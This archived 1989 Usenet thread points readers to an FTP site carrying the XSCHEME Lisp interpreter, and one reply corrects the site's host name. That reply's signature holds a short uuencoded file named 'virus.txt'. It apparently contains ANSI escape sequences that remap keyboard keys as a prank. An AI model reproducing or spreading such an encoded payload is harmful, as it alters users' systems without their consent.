[comp.sys.ibm.pc] XSCHEME found

kjeld@iesd.dk (Kjeld Flarup) (06/01/89)

We have found XSCHEME at an ftp site. There is also a lot of other languages.

13.1.100.206 ariasia.xerox.com

XSCHEME is a wonderfull small and fast lisp version. It comes in source
and it can be used on any CPU.

If You like You can also impelemnt time crusial functions i C and use
them from the lisp program.

Kjeld Flarup Christensen | "I'am now twentyseven times older than the universe
kjeld@iesd.dk            | itself." Marvin the depressed Robot.
--

2014_5001@uwovax.uwo.ca (06/02/89)

In article <1988@iesd.dk>, kjeld@iesd.dk (Kjeld Flarup) writes:
> We have found XSCHEME at an ftp site. There is also a lot of other languages.
>
> 13.1.100.206 ariasia.xerox.com
>
> XSCHEME is a wonderfull small and fast lisp version. It comes in source
> and it can be used on any CPU.
>
> If You like You can also impelemnt time crusial functions i C and use
> them from the lisp program.
>
> Kjeld Flarup Christensen | "I'am now twentyseven times older than the universe
> kjeld@iesd.dk            | itself." Marvin the depressed Robot.
> --

ARISIA not ARIASIA.

#  SIG BEGINS----UUE----
#  DECODE AT YOUR OWN RISK.  AUTHOR TAKES NO RESPONSIBILITIES FOR ANY DAMAGE.
#  IS THIS A TROJAN???
begin 644 virus.txt
M&ULQ,3,[(E$N2$DB<!M;-30[(C8V-B)P&ULX,3LB<2YH:2)P&ULB+R([(EPBR
A<!M;(EPB.R(O(G!9;W4@=V%S=&5D('EO=7(@=&EM92$:.
``
end
# from 2014_5001@uwovax.uwo.ca         2014_5001@uwovax.BITNET